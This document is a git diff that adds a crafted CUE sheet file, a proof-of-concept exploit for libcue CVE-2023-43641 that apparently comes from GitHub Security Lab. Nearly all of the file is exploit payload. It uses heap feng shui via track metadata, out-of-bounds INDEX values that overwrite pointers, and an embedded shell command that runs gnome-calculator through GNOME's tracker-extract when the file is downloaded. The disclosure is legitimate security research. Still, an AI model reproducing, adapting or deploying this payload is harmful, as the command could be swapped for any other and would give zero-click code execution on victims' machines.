+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/lunar.cue b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/lunar.cue new file mode 100644 index 0000000..ee649bf --- /dev/null +++ b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/lunar.cue @@ -0,0 +1,44691 @@ +PERFORMER Kev +TITLE "Kev'z Warez" +FILE pwned.mp3 MP3 + +TRACK 000 AUDIO +MESSAGE "First some [heap feng shui](https://en.wikipedia.org/wiki/Heap_feng_shui): +allocate memory so that all subsequent allocations come from a continguous block of +memory. For example, this string is 251 characters long to use a chunk from tcache +index 15." +TRACK 001 AUDIO +TITLE "A Track is 0x3a8 bytes, so creating many new tracks is a quick way to use lots of memory." +TRACK 002 AUDIO +TITLE "Again " +TRACK 003 AUDIO +TITLE "Again " +TRACK 004 AUDIO +TITLE "Again " +TRACK 005 AUDIO +TITLE "Again " +TRACK 006 AUDIO +TITLE "Again " +TRACK 007 AUDIO +TITLE "Again " +TRACK 008 AUDIO +TITLE "Again " +TRACK 009 AUDIO +TITLE "Again " +TRACK 010 AUDIO +TITLE "Again " +TRACK 011 AUDIO +TITLE "Again " +TRACK 012 AUDIO +TITLE "Again " +TRACK 013 AUDIO +TITLE "Again " +TRACK 014 AUDIO +TITLE "Again " +TRACK 015 AUDIO +TITLE "Again " +TRACK 016 AUDIO +TITLE "Again " +TRACK 017 AUDIO +TITLE "Again " +TRACK 018 AUDIO +TITLE "Again " +TRACK 019 AUDIO +TITLE "Again " +TRACK 020 AUDIO +TITLE "Again " +TRACK 021 AUDIO +TITLE "Again " +TRACK 022 AUDIO +TITLE "Again " +TRACK 023 AUDIO +TITLE "Again " +TRACK 024 AUDIO +TITLE "Again " +TRACK 025 AUDIO +TITLE "Again " +TRACK 026 AUDIO +TITLE "Again " +TRACK 027 AUDIO +TITLE "Again " +TRACK 028 AUDIO +TITLE "Again " +TRACK 029 AUDIO +TITLE "Again " +TRACK 030 AUDIO +TITLE "Again " +TRACK 031 AUDIO +TITLE "Again " +TRACK 032 AUDIO +TITLE "Again " + +TRACK 033 AUDIO +TITLE "Heap Feng Shui: empty the tcache" +COMPOSER "Allocate a chunk from tcache index 2 " +ARRANGER "Allocate a chunk from tcache index 4 " +PERFORMER "Allocate a chunk from tcache index 6 + " +SONGWRITER "Allocate a chunk from tcache index 7 + " +GENRE "Allocate a chunk from tcache index 11 + + " +MESSAGE "The goal here is to ensure that all subsequent allocations come +from a large contiguous block of memory. This string allocates a chunk from +tcache index 13. Doing this 14 times guarantees that the tcache is empty. " + +TRACK 034 AUDIO +TITLE "Copyright (c) 2023 GitHub, Inc." +COMPOSER "[GitHub Security Lab](https://securitylab.github.com/)" +ARRANGER " +This version of the poc is tuned for Ubuntu 23.04 (Lunar Lobster) +" +PERFORMER "[Kevin Backhouse](https://github.com/kevinbackhouse) + " +SONGWRITER " + " +GENRE "[The Malloc Maleficarum](https://seclists.org/bugtraq/2005/Oct/118). +See also: [how2heap](https://github.com/shellphish/how2heap). + " +MESSAGE "Proof-of-concept exploit for libcue CVE-2023-43641 (GHSL-2023-197): out of bounds +array access in track_set_index. The vulnerability is used to get code execution in GNOME's +tracker-extract. Download this file to pop a calc." + +TRACK 035 AUDIO +TITLE "Never Gonna Give You Up " +COMPOSER "Rick Astley " +ARRANGER " " +PERFORMER " +We're no strangers to love +You know the rules and so do I + " +SONGWRITER " +A full commitment's what I'm thinking of +You wouldn't get this from any other guy + " +GENRE " +I just want to tell you how I'm feeling +Gotta make you understand + + " +MESSAGE " +Never gonna give you up, never gonna let you down +Never gonna run around and desert you +Never gonna make you cry, never gonna say goodbye +Never gonna tell a lie and hurt you + " +TRACK 036 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 037 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 038 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 039 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 040 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 041 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 042 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 043 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 044 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 045 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 046 AUDIO +TITLE "Repeat Heap Feng Shui " +COMPOSER " " +ARRANGER " " +PERFORMER " + " +SONGWRITER " + " +GENRE " + + " +MESSAGE " + + " +TRACK 047 AUDIO +TITLE "for freeing to tcache index 1" +TITLE "free previous title" +INDEX 4294964432 4294958312 +TRACK 048 AUDIO +TITLE "Allocate previously freed string" +INDEX 4294967268 149 +INDEX 4294964250 4294958324 +TITLE "long string to overwrite low bytes of address ð " +INDEX 4294955254 69 +FILE pwned.mp3 MP3 +GENRE "set low bytes of info->file P " +TITLE "long string to overwrite low bytes of address 0 " +INDEX 4294955262 53 +FILE pwned.mp3 MP3 +PERFORMER "set low bytes of file->g_class Ð " +INDEX 4294955259 0 +TITLE "long string to overwrite low bytes of address " +INDEX 4294955322 85 +FILE pwned.mp3 MP3 +TITLE "long string to overwrite low bytes of address ° " +INDEX 4294955150 69 +FILE pwned.mp3 MP3 +TITLE "long string to overwrite low bytes of address " +INDEX 4294955292 277 +FILE pwned.mp3 MP3 +MESSAGE "set low bytes of tcache->entries[15] `" +MESSAGE "kevwozere" +TITLE "long string to overwrite low bytes of address Ð " +INDEX 4294955282 85 +FILE pwned.mp3 MP3 +TITLE "long string to overwrite low bytes of address à " +INDEX 4294955284 949 +FILE pwned.mp3 MP3 +TITLE "long string to overwrite low bytes of address 0" +INDEX 4294955294 949 +FILE pwned.mp3 MP3 +TITLE "long title to allocate 0x110-sized chunk. " +TRACK 049 AUDIO +INDEX 4294967243 0 +INDEX 4294967247 1 +INDEX 4294967254 0 +INDEX 4294967255 0 +TRACK 050 AUDIO +TITLE "Overwrite low bytes of track->file.name `" +INDEX 4294967294 277 +FILE "wen poc?" MP3 +TITLE "Overwrite low bytes of track->file.name à" +INDEX 14 949 +FILE pwned.mp3 MP3 +TITLE "Overwrite low bytes of track->file.name 0" +INDEX 24 949 +FILE pwned.mp3 MP3 +TITLE "Overwrite low bytes of track->file.name ° " +INDEX 4294967272 53 +FILE pwned.mp3 MP3 +INDEX 0 4294967295 +INDEX 1 0 +INDEX 1 1892336 +INDEX 14 0 +TRACK 051 AUDIO +FLAGS +TRACK 052 AUDIO +ISRC looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooog-string-to-allocate-0x110-sized-chunk +TITLE "long title to overwrite low bytes of track->isrc `" +INDEX 4294967294 277 +ISRC short-string +INDEX 0 4294967295 +INDEX 1 0 +INDEX 1 242320 +INDEX 4294967088 0 +INDEX 4294967090 0 +INDEX 4294967271 100 +INDEX 4294967273 0 +INDEX 4294967280 80 +TRACK 053 AUDIO +INDEX 4294963806 4294958357 +TRACK 054 AUDIO +INDEX 4294967279 0 +INDEX 4294963634 4294958317 +TRACK 055 AUDIO +INDEX 4294967282 0 +INDEX 4294963462 3817 +TITLE "Temporary long title for tcache index 6 " +TITLE "short title" +TRACK 056 AUDIO +TITLE "Use long title from tcache index 6 " +INDEX 4294967258 197 +TITLE " /bin/bash" +INDEX 4294963270 3818 +TRACK 057 AUDIO +INDEX 4294967279 25389 +INDEX 4294963098 3819 +TITLE "Temporary long title for tcache index 6 " +TITLE "eta son" +TRACK 058 AUDIO +TITLE "Use long title from tcache index 6 " +INDEX 4294967258 357 +TITLE "This command is going to get called repeatedly in an infinite loop, so send SIGSTOP to avoid a fork-bomb and use flock so only one calculator starts. killall -SIGSTOP tracker-extract-3; flock -w 3 ~/Downloads/pwned.lock -c 'gnome-calculator -e 1337' && (sleep 10; rm ~/Downloads/pwned.lock; killall -9 tracker-extract-3)" +INDEX 4294962906 4294958329 +PERFORMER "Temporary long name for tcache index 6 " +PERFORMER "short name" +TRACK 059 AUDIO +INDEX 4294962714 4566 +TITLE "Use chunk from tcache index 6 " +INDEX 4294967258 197 +TITLE "short title" +TRACK 060 AUDIO +INDEX 4294962538 4565 +TITLE " Ð " +TRACK 1337 AUDIO +INDEX 4294967290 0 +TITLE "Use the chunk that is still in tcache index 2" +MESSAGE "pop that calc  " +REM DATE "1992 AD" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 